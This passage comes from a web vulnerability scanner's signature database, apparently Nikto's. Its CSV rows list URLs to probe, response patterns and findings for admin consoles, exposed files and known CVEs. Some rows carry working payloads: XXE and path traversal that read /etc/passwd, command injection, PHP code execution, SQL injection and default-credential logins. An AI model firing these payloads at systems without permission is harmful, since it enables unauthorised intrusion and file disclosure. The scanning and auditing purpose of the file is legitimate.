edited by remote attackers.","","" "006800","","0","@FCKEDITOReditor/filemanager/connectors/asp/connector.asp?Command=GetFolders&Type=File&CurrentFolder=%2F","GET","</Connector>","This\sconnector\sis\sdisabled","","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "006801","","0","@FCKEDITOReditor/filemanager/connectors/aspx/connector.aspx?Command=GetFolders&Type=File&CurrentFolder=%2F","GET","</Connector>","This\sconnector\sis\sdisabled","","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "006802","","0","@FCKEDITOReditor/filemanager/connectors/cfm/connector.cfm?Command=GetFolders&Type=File&CurrentFolder=%2F","GET","</Connector>","This\sconnector\sis\sdisabled","","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "006803","","0","@FCKEDITOReditor/filemanager/connectors/lasso/connector.lasso?Command=GetFolders&Type=File&CurrentFolder=%2F","GET","</Connector>","This\sconnector\sis\sdisabled","","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "006804","","0","@FCKEDITOReditor/filemanager/connectors/perl/connector.cgi?Command=GetFolders&Type=File&CurrentFolder=%2F","GET","</Connector>","This\sconnector\sis\sdisabled","","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "006805","","0","@FCKEDITOReditor/filemanager/connectors/php/connector.php?Command=GetFolders&Type=File&CurrentFolder=%2F","GET","</Connector>","This\sconnector\sis\sdisabled","","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "006806","","0","@FCKEDITOReditor/filemanager/connectors/py/connector.py?Command=GetFolders&Type=File&CurrentFolder=%2F","GET","</Connector>","This\sconnector\sis\sdisabled","","","","FCKeditor could allow files to be updated or edited by remote attackers.","","" "006807","","123","/.git/config","GET","\[core\]","\[branch","","","","Git config file found. Infos about repo details may be present.","","" "006808","","e","/solr/admin/","GET","Solr\sadmin\spage","","","","","Apache Solr administration console found","","" "006809","","2abe","/html/vergessen.html","GET","uiRestoreFactoryDefaults","","","","","The Fritz!Box gateway allows any user to restore factory default settings.","","" "006810","https://docs.typo3.org/m/typo3/guide-installation/master/en-us/QuickInstall/TheInstallTool/Index.html","2","@TYPO3typo3/install/index.php","GET","200","","Install\sTool","","","TYPO3 Install Tool identified.","","" "006811","","2be","/dnnLogin.aspx","GET","Enter\syour\sUser\sName\sbelow","","","","","DotNetNuke Login page found.","","" "006812","","2be","/dnn/Login.aspx","GET","Login_DNN","","","","","DotNetNuke Login page found.","","" "006813","","2be","/tabid/400999900/ctl/Login/portalid/699996/Default.aspx","GET","Login_DNN","","","","","DotNetNuke Login page found with random tabid and portalid parameters.","","" "006814","","2b","/Portals/_default/Cache/ReadMe.txt","GET","cache\ssynchronization","","","","","DotNetNuke default page found. Look for an admin interface on /tabid/19/, /tabid/36/ or enumerate numbers to identify logins/content.","","" "006815","CVE-2013-5117 http://exploit-db.com/exploits/27602/","9","/DesktopModules/DNNArticle/DNNArticleRSS.aspx?portalid=18&moduleid=0&categoryid=1+or+1=@@junk","GET","Conversion\sfailed","","","","","DotNetNuke SQL injection found.","","" "006816","http://exploit-db.com/exploits/12700/","52","/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx","GET","Link\sGallery","","","","","DotNetNuke Link Gallery may allow file upload/retrieval.","","" "006817","","23","@TYPO3typo3_src/ChangeLog","GET","Release\sof\sTYPO3","","","","","TYPO3 ChangeLog file found.","","" "006818","","23","/_about","GET","Tildeslash","","","","","Unrestricted Monit web interface found. This reveals sensitive information, and may allow stopping of critical services.","","" "006819","","b","/CFIDE/componentutils/cfcexplorer.cfc","GET","Component Browser Login","","","","","ColdFusion Component Browser. Default password may be 'admin'.","","" "006820","","1","/includes/db.inc","GET","200","<\?php","","","","Include files (.inc) should not be served in plain text.","","" "006821","","2","/bcb/bcbadmSystemInfo.jsp","GET","SAP SOAP URL:","","","","","SAP Business Communication Broker (bcb) may reveal system information.","","" "006822","CVE-2009-1380","3b","/jmx-console/HtmlAdaptor?action=inspectMBean&name=Catalina%3Atype%3DServer","GET","Shutdown password","","","","","JBoss JMX Agent reveals the shutdown password and port information","","" "006823","","be","/portlet/login/login.jsp","GET","sign-in-form","","","","","LifeRay Portal administrative login found.","","" "006824","CVE-2014-3704 https://www.sektioneins.de/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html","9a","/CHANGELOG.txt","GET","Drupal 7\.([012][0-9]|3[0-1])","","","","","Version number implies that there is a SQL Injection in Drupal 7, which can be used for authentication bypass (Drupalgeddon).","","" "006825","","1","/debug.jsp","GET","200","","","","","Possible debug directory/program found.","","" "006826","","1","/debug.asp","GET","200","","","","","Possible debug directory/program found.","","" "006827","","1","/debug.php","GET","200","","","","","Possible debug directory/program found.","","" "006828","","1","/debug/","GET","200","","","","","Possible debug directory/program found.","","" "006829","","1","/stats","GET","Statistics\sReport","","","","","HAProxy stats page found.","","" "006830","","1","/haproxy_stats","GET","Statistics\sReport","","","","","HAProxy stats page found.","","" "006831","","2b","/cgi-bin/info.cgi","GET","200","","Model=WDMyCloud","","","WD My Cloud (Mirror) NAS found. Default credentials for the login on / is 'admin' with an empty password.","","" "006832","CVE-2001-1013","23","/~ftp/","GET","200","","","rtsptext","","Allowed to browse ftp user's home directory.","","" "006833","","3","/web.config.local","GET","<configuration>","","200","","","ASP config (development) file is accessible.","","" "006834","","123b","/pom.xml","GET","<project>","","","","","Maven Project Object Model file may contain interesting information.","","" "006835","","123b","/project.xml","GET","<project>","","","","","Maven Project Object Model file may contain interesting information.","","" "006836","","123b","/maven.xml","GET","<project","","","","","Maven Project Object Model file may contain interesting information.","","" "006837","","1","/ultrasearch/","GET","Oracle Ultra Search","","","","","Oracle Ultrasearch page found.","","" "006838","","be","/useradmin/index.jsp","GET","/useradmin/userAdminServlet","","","","","SAP Admin interface.","","" "006839","","be","/uddiclient/jsps/index.jsp","GET","apUrMapi_","","","","","SAP Admin interface.","","" "006840","","be","/webdynpro/dispatcher/sap.com/tc~lm~webadmin~mainframe~wd/WebAdminApp","GET","SAP\sNetWeaver","","","","","SAP Admin interface.","","" "006841","","be","/admin/","GET","<title>Magnolia Login Form<\/title>","","<h1>Magnolia Login<\/h1>","","","Magnolia administrative login found.","","" "006842","","3be","@TYPO3superadmin.php","GET","<title>TYPO3\sSuper\sAdmin</\title>","<title>Typo3\sSuper\sAdmin<\/title>","200","","","TYPO3 Super Admin component identified. This could contain passwords and infos about the current installed TYPO3 instances.","","" "006843","","3be","@TYPO3misc/superadmin.php","GET","<title>TYPO3\sSuper\sAdmin<\/title>","<title>Typo3\sSuper\sAdmin<\/title>","200","","","TYPO3 Super Admin component identified. This could contain passwords and infos about the current installed TYPO3 instances.","","" "006844","","d","/_vti_bin/lists.asmx","GET","Lists\sWeb\sService","","","","","Microsoft Sharepoint WebService available.","","" "006845","","d","/_vti_bin/Admin.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006846","","d","/_vti_bin/alerts.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006847","","d","/_vti_bin/AreaService.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006848","","d","/_vti_bin/Authentication.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006849","","d","/_vti_bin/BusinessDataCatalog.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006850","","d","/_vti_bin/copy.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006851","","d","/_vti_bin/dspsts.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006852","","d","/_vti_bin/dws.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006853","","d","/_vti_bin/ExcelService.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006854","","d","/_vti_bin/forms.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006855","","d","/_vti_bin/imaging.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006856","","d","/_vti_bin/meetings.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006857","","d","/_vti_bin/people.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006858","","d","/_vti_bin/People.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006859","","d","/_vti_bin/permissions.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006860","","d","/_vti_bin/Permissions.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006861","","d","/_vti_bin/search.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006862","","d","/_vti_bin/SharepointEmailWS.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006863","","d","/_vti_bin/SiteData.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006864","","d","/_vti_bin/sites.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006865","","d","/_vti_bin/spscrawl.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006866","","d","/_vti_bin/spsdisco.aspx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006867","","d","/_vti_bin/spsearch.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006868","","d","/_vti_bin/UserGroup.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006869","","d","/_vti_bin/UserProfileService.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006870","","d","/_vti_bin/versions.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006871","","d","/_vti_bin/views.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006872","","d","/_vti_bin/Views.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006873","","d","/_vti_bin/webpartpages.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006874","","d","/_vti_bin/WebPartPages.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006875","","d","/_vti_bin/webs.asmx","GET","Service\sDescription","","","","","Microsoft Sharepoint WebService available.","","" "006876","","b1","/_vti_bin/owssvr.dll","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006877","","b1","/_vti_bin/_vti_adm/admin.exe","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006878","","b1","/_vti_bin/_vti_aut/author.exe","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006879","","b1","/_vti_bin/_vti_aut/WS_FTP.log","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006880","","b1","/_vti_bin/_vti_aut/ws_ftp.log","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006881","","b1","/_vti_bin/_vti_aut/author.dll","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006882","","b1","/_layouts/addrole.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006883","","b1","/_layouts/AdminRecycleBin.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006884","","b1","/_layouts/AreaNavigationSettings.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006885","","b1","/_Layouts/AreaTemplateSettings.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006886","","b1","/_Layouts/AreaWelcomePage.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006887","","b1","/_layouts/bpcf.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006888","","b1","/_Layouts/ChangeSiteMasterPage.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006889","","b1","/_layouts/create.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006890","","b1","/_layouts/editgrp.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006891","","b1","/_layouts/editprms.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006892","","b1","/_layouts/help.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006893","","b1","/_layouts/images/","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006894","","b1","/_layouts/listedit.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006895","","b1","/_layouts/ManageFeatures.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006897","","b1","/_layouts/mcontent.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006898","","b1","/_layouts/mngctype.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006899","","b1","/_layouts/mngfield.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006900","","b1","/_layouts/mngsiteadmin.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006901","","b1","/_layouts/mngsubwebs.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006902","","b1","/_layouts/mngsubwebs.aspx?view=sites","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006903","","b1","/_layouts/mobile/mbllists.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006904","","b1","/_layouts/MyInfo.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006905","","b1","/_layouts/MyPage.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006906","","b1","/_layouts/MyTasks.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006907","","b1","/_layouts/navoptions.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006908","","b1","/_layouts/NewDwp.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006909","","b1","/_layouts/newgrp.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006910","","b1","/_layouts/newsbweb.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006912","","b1","/_layouts/PageSettings.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006913","","b1","/_layouts/people.aspx?MembershipGroupId=0","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006914","","b1","/_layouts/permsetup.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006915","","b1","/_layouts/picker.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006916","","b1","/_layouts/policy.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006917","","b1","/_layouts/policyconfig.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006918","","b1","/_layouts/policycts.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006919","","b1","/_layouts/Policylist.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006920","","b1","/_layouts/prjsetng.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006921","","b1","/_layouts/quiklnch.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006922","","b1","/_layouts/recyclebin.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006923","","b1","/_Layouts/RedirectPage.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006924","","b1","/_layouts/role.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006925","","b1","/_layouts/settings.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006926","","b1","/_layouts/SiteDirectorySettings.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006927","","b1","/_layouts/sitemanager.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006928","","b1","/_layouts/SiteManager.aspx?lro=all","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006929","","b1","/_layouts/spcf.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006930","","b1","/_layouts/storman.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006931","","b1","/_layouts/themeweb.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006932","","b1","/_layouts/topnav.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006933","","b1","/_layouts/user.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006934","","b1","/_layouts/userdisp.aspx?ID=1","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006935","","b1","/_layouts/useredit.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006936","","b1","/_layouts/useredit.aspx?ID=1","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006937","","b1","/_layouts/viewlsts.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006938","","b1","/_layouts/vsubwebs.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006939","","b1","/_layouts/WPPrevw.aspx?ID=247","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006940","","b1","/_layouts/wrkmng.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006941","","b1","/Forms/DispForm.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006942","","b1","/Forms/DispForm.aspx?ID=1","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006943","","b1","/Forms/EditForm.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006944","","b1","/Forms/EditForm.aspx?ID=1","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006945","","b1","/Forms/Forms/AllItems.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006946","","b1","/Forms/MyItems.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006947","","b1","/Forms/NewForm.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006948","","b1","/Pages/default.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006949","","b1","/Pages/Forms/AllItems.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006950","","b1","/_catalogs/masterpage/Forms/AllItems.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006951","","b1","/_catalogs/wp/Forms/AllItems.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006952","","b1","/_catalogs/wt/Forms/Common.aspx","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006953","","b1","/_vti_pvt/service.grp","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006954","","b1","/_vti_pvt/botsinf.cnf","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006955","","b1","/_vti_pvt/structure.cnf","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006956","","b1","/_vti_pvt/uniqperm.cnf","GET","200","","","","","FrontPage/Sharepointfile available.","","" "006957","","0","/Editor/assetmanager/assetmanager.php","GET","Upload\sFile","","","","","InnovaStudio file uploader found","","" "006958","","23","/Glimpse.axd","GET","Standard\sSettings","","","","","Glimpse debug program found","","" "006959","","3","/edevicedesc.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006960","","3","/bmlinks/ddf.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006961","","3","/configd.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006962","","3","/description.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006963","","3","/DeviceDescription.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006964","","3","/etc/linuxigd/gatedesc.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006965","","3","/igddesc.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006966","","3","/IPCamDesc.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006967","","3","/MediaServerDevDesc.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006968","","3","/mini.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006969","","3","/NasDevice.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006970","","3","/nasService.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006971","","3","/PrintBasicDevice.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006972","","3","/Public_UPNP_gatedesc.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006973","","3","/rootDesc.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006974","","3","/rss/Starter_desc.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006975","","3","/simplecfg.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006976","","3","/tr064dev.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006977","","3","/upnp/IGD.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006978","","3","/upnp/printer/ddf.xml","GET","<root","","upnp-org","","","Device UPnP XML file found, which may leak device information.","","" "006979","","d","/apidocs/","GET","API\sDoc","","","","","Possible API documentation available.","","" "006980","","3","/ipn_log.txt","GET","payer_email","","","","","PayPal log file found and may contain sensitive information.","","" "006981","","3","/paypal/ipn_log.txt","GET","payer_email","","","","","PayPal log file found and may contain sensitive information.","","" "006983","","3","/psystems/paypal/ipn_log.txt","GET","payer_email","","","","","PayPal log file found and may contain sensitive information.","","" "006984","","3be","/_profiler/","GET","symfony","No\sroute","","","","Symfony Profiler may reveal sensitive application information.","","" "006985","CVE-2014-3398","3b","/CSCOSSLC/config-auth","GET","<version who=[^>]+>.+<\/version>","","","","","Cisco ASA Web VPN may reval sensitive version info.","","" "006986","","d","@MAGENTOapi/soap/?wsdl=1","GET","<definitions xmlns:typens=\"urn:Magento\"","","","","","Magento Shop WebService identified.","","" "006987","","123b","@MAGENTORELEASE_NOTES.txt","GET","==== ([0-9\.]+) ====","","","","","Magento Shop Changelog identified.","","" "006988","","e","@MAGENTOadmin/","GET","Magento\sInc","","","","","Magento Shop admin backend identified.","","" "006989","","e","@MAGENTOdownloader/","GET","Magento\sConnect\sManager\sver","","","","","Magento Connect Manager login identified. This might also reval the installed version of Magento","","" "006990","","3b","@AXIS2services/Version/getVersion","GET","Hello\sI\sam\sAxis2","Hi\s-\sthe\sAxis2\sversion\sis","","","","Apache Axis2 version identified.","","" "006991","","b","@ADOBEXML","GET","<amfx ver=","","</amfx>","","","Adobe BlazeDS identified.","","" "006992","CVE-2009-3960","357","@ADOBEXML","GET","root:","","","","","Adobe BlazeDS is vulnerable to an XXE","<?xml version=\"1.0\" encoding=\"utf-8\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"/etc/passwd\"> ]><amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\"><body><object type=\"flex.messaging.messages.CommandMessage\"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits/></object><null/><string/><string/><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string>&xxe;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>","Content-Length: 714" "006993","CVE-2003-0411","3","/index.JSP","GET","<\%","","\%>","","","Sun ONE Application Server 7.0 for Windows 2000/XP allows remote attackers to obtain JSP source code via a request that uses the uppercase .JSP extension instead of the lowercase .jsp extension.","","" "006994","","8","/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26cat%20%22/etc/passwd%22%26","GET","root:x:0","","","","","Mitel Audio and Web Conferencing (AWC) contains a command execution vulnerability.","","" "006995","","b","/portal/","GET","Mitel\sNetworks","","","","","Mitel Audio and Web Conferencing login found.","","" "006996","","b","/server-manager/","GET","401","","","","","Mitel Audio and Web Conferencing server manager identified.","","" "006997","","b","/awcuser/cgi-bin/vcs?xml=withXsl&xsl=/vcs/vcs_home.xsl&show_codes=¤t_vanities=&settings=global%3buser%3bphone&show_port_res_settings","GET","Verify\sClient","","","","","Mitel Audio and Web Conferencing found.","","" "006998","","e","@JENKINSmanage","GET","Manage\sJenkins","Manage\sHudson","","","","Jenkins/Hudson Management console accessible without authentication.","","" "006999","","8","@JENKINSscript","GET","Script\sConsole","","Groovy\sscript","","","Jenkins/Hudson Groovy Script console accessible without authentication. This allows to execution of shell commands.","","" "007000","","d","@AXIS2services/listServices","GET","<title>List\sServices","","","","","Apache Axis2 WebServices identified.","","" "007001","","b","@AXIS2axis2-web/index.jsp","GET","<title>Axis\s2\s-\sHome","","","","","Apache Axis2 Web Application identified.","","" "007004","CVE-2010-2103","b8e","@AXIS2axis2-admin/login","POST","Welcome\sto\sAxis2\sWeb\sAdmin\sModule\s!!","","","","","Apache Axis2 administration console with default credentials admin:axis2 found.","userName=admin&password=axis2&submit=+Login+","" "007006","","be","/adminer.php","GET","<title>Select\sdatabase\s-","","www\.adminer\.org","","","The Adminer program is a database admin access tool which can allow full administrative access to databases.","","" "007007","https://github.com/tennc/webshell/blob/master/php/404.php.txt","b","/404.php","GET","<input type=password name=pass>","","","","","The 404.php backdoor program seems to be present.","","" "007009","","be","@AXIS2Login.jsp","GET","Login\sto\sAxis2::","","","","","Apache Axis2 administration console found.","","" "007010","CVE-2015-2208","8","@MODIR@MOFILE","POST","uid=","","gid=","","","PHPMoAdmin is vulnerable to a remote code execution.","object=1;system('id');","" "007011","CVE-2015-2208","8","@MODIR@MOFILE?collection=secpulse&action=listRows&find=array();phpinfo();exit;","GET","<title>phpinfo\(\)","","","","","PHPMoAdmin is vulnerable to a remote code execution.","","" "007012","","be","@MODIR@MOFILE","GET","<title>phpMoAdmin","","","","","PHPMoAdmin identified.","","" "007013","","be","@RAINLOOP?admin","GET","RainLoop\sTeam","","rainloopAppData","","","RainLoop Webmail admin backend identified. Default credentials are admin:12345","","" "007014","","b9","@WORDPRESSwp-content/plugins/gravityforms/change_log.txt","GET","200","","","1\.9\.3\.6","","Gravity forms is installed. Based on the version number in the changelog, it is vulnerable to an authenticated SQL injection. https://wpvulndb.com/vulnerabilities/7849","","" "007015","","b","@TOMCATADMINstatus","GET","<tt>conf\/tomcat-users\.xml<\/tt>","","","","","Default Tomcat Server Status interface found","","" "007016","","b","@TOMCATADMINstatus","GET","401","","","","","Tomcat Server Status interface found (pass protected)","","" "007017","","be","@TOMCATADMINlogin.jsp","GET","<title>Tomcat Server Administration","","","","","Tomcat Server Administration interface found","","" "007020","","b","/README.mediawiki","GET","== MediaWiki ==","","","","","Mediawiki README file found","","" "007021","","123b","@MANTISdoc/RELEASE","GET","MantisBT Release Notes","(Maintenance|Stable|Security) Release","","","","Mantis Bugtracker Release Notes identified.","","" "007022","","123b","@DOKUWIKIVERSION","GET","[0-9]+\-[0-9]+\-[0-9]+[a-z]? \"[a-zA-Z].*\"","","","","","Dokuwiki Version file identified.","","" "007023","","e","/solr/#/","GET","<span>Apache\sSOLR","","","","","Apache Solr console found","","" "007024","","be","/sixcms/admin/login/","GET","<title>SixCMS","","","","","SixCMS Administration interface found","","" "007025","","be","@ROCKMONGOindex.php?action=login.index","GET","<title>RockMongo","","","","","RockMongo MongoDB administration tool found. Default credentials are admin:admin.","","" "007026","","be","@ROCKMONGOindex.php?action=admin.index","GET","Command Line","Build Information","<title>RockMongo","","","Unprotected RockMongo MongoDB administration tool found.","","" "007027","http://humanstxt.org/","3","/humans.txt","GET","200","","","","","The humans.txt file may reveal information aboute site owners/developers.","","" "007028","","be","/wba/home.html","GET","(LANSA\sGroup|Arterial\sSoftware)","","","","","Lansa aXis administration console found.","","" "007029","","be","/axesde/","GET","LANSA\sGroup","","","","","Lansa aXis Data Explorer console found.","","" "007031","","be","/ts/skins/ts_basic.html?lang=en/","GET","aXes\sTerminal\sServer","","","","","Lansa aXis terminal explorer found.","","" "007032","","be","/ts/dev/index.html?lang=en/","GET","aXes\sTerminal\sServer","","","","","Lansa aXis terminal explorer found.","","" "007033","","be","/wba/browser_test.html","GET","aXes\sBrowser\sCompatibility","","","","","Lansa aXes Browser Compatibility.","","" "007034","","be","/echo","GET","FastCGI\sEcho","","","","","Lansa aXes echo page found.","","" "007035","","b","/cgi-bin/lansaweb?about","GET","LANSA\sfor\sthe\sWeb","","","","","Lansa for the Web main CGI found.","","" "007036","https://www.phpmyadmin.net/","b","@PHPMYADMINdoc/html/index.html","GET","phpMyAdmin.*Documentation","","200","","","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.","","" "007037","https://www.phpmyadmin.net/","b","@PHPMYADMINdocs/html/index.html","GET","phpMyAdmin.*Documentation","","200","","","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.","","" "007038","","3","/mod_gzip_status","GET","mod_gzip_version","mod_gzip_on","200","","","The mod_gzip_status page may reveal the version of mod_gzip running on this host.","","" "007039","CVE-2015-2857","7","/courier/intermediate_login.html","GET","root:0","","","","","Accellion allows LFI via the statecode cookie.","","Cookie: statecode=../../../../../../../../../etc/passwd%00" "007040","CVE-2015-2856","8","/tws/getStatus","POST","\"result_msg\":\"Success\"","","","","","Accellion allows RCE oath_token.","transaction_id=1&oauth_token='%3becho '","" "007041","","3","/rails/info/properties/","GET",">(Ruby|Rails)\sversion<","<title>Routes<\/title>","200","","","The Ruby on Rails status page may reveal the version of RoR and further details on this host.","","" "007042","","3","/rails/info/routes/","GET","<title>Routes</title>","","200","","","The Ruby on Rails routes page may reveal all available routes on this host.","","" "007043","","d","/wps/wsdl","GET","wsdl:definitions","","","","","IBM Websphere web services found.","","" "007044","","1e","/wps/portal/Home/Welcome/!ut/","GET","Sign\sUp","","","","","IBM Websphere default portal found. May allow users to create accounts.","","" "007045","CVE-2015-2067","5","@MAGMIweb/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility","GET","root:","","","","","MAGMI allows any file to be retrieved remotely.","","" 